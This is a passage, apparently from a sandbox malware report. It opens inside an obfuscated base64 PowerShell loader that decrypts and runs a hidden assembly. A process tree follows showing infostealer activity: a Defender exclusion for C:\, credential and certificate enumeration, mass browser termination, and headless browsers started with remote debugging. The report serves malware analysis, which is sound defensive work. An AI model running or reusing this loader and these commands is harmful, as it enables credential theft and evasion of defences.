Q29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5360
      - C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
        6⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2716
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_4074842567.txt\""
        7⤵
        NTFS ADS
        
        PID:1540
        
        C:\Windows\system32\net.exe
        
        "net" statistics workstation
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:212
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 statistics workstation
        8⤵
        
        PID:5320
        
        C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        7⤵
        
        PID:3664
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4744
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:740
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:4692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        8⤵
        
        PID:2568
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1952
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        7⤵
        
        PID:2112
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        7⤵
        
        PID:5892
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1920
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5192
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4524
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3664
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3940
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:432
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5336
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4556
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:1552
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        7⤵
        
        PID:1624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1588
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5576
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:740
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5436
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1812
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4724
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6096
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5604
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1752
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM Discord.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5360
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1952
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordCanary.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5892
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5856
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordPTB.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4736
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordDevelopment.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4580
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5236
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4684
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5716
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:912
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM whale.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5948
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5500
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3728
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:5780
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:1184
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        7⤵
        
        PID:5576
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        7⤵
        Kills process with taskkill
        
        PID:3780
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        7⤵
        Kills process with taskkill
        
        PID:2260
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        7⤵
        Kills process with taskkill
        
        PID:1540
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM firefox.exe
        7⤵
        Kills process with taskkill
        
        PID:4508
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM dragon.exe
        7⤵
        
        PID:6040
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM maxthon.exe
        7⤵
        Kills process with taskkill
        
        PID:4156
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM uc_browser.exe
        7⤵
        
        PID:1612
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM slimjet.exe
        7⤵
        Kills process with taskkill
        
        PID:2412
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:3856
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM epic.exe
        7⤵
        Kills process with taskkill
        
        PID:3036
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM torch.exe
        7⤵
        
        PID:2112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2780
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM whale.exe
        7⤵
        Kills process with taskkill
        
        PID:532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5360
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM 360browser.exe
        7⤵
        
        PID:4260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1952
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM qqbrowser.exe
        7⤵
        Kills process with taskkill
        
        PID:2924
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:3896
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:3820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41060 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:1352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd493cdcf8,0x7ffd493cdd04,0x7ffd493cdd10
        8⤵
        
        PID:4492
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2656,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2652 /prefetch:2
        8⤵
        Modifies registry class
        
        PID:5176
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2000,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2516 /prefetch:3
        8⤵
        
        PID:4872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2700,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2688 /prefetch:8
        8⤵
        
        PID:4708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2924,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2920 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2996,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2988 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3964,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3916 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4468,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4460 /prefetch:8
        8⤵
        
        PID:2160
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:3608
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:4692
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:4508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=42816 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:1944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
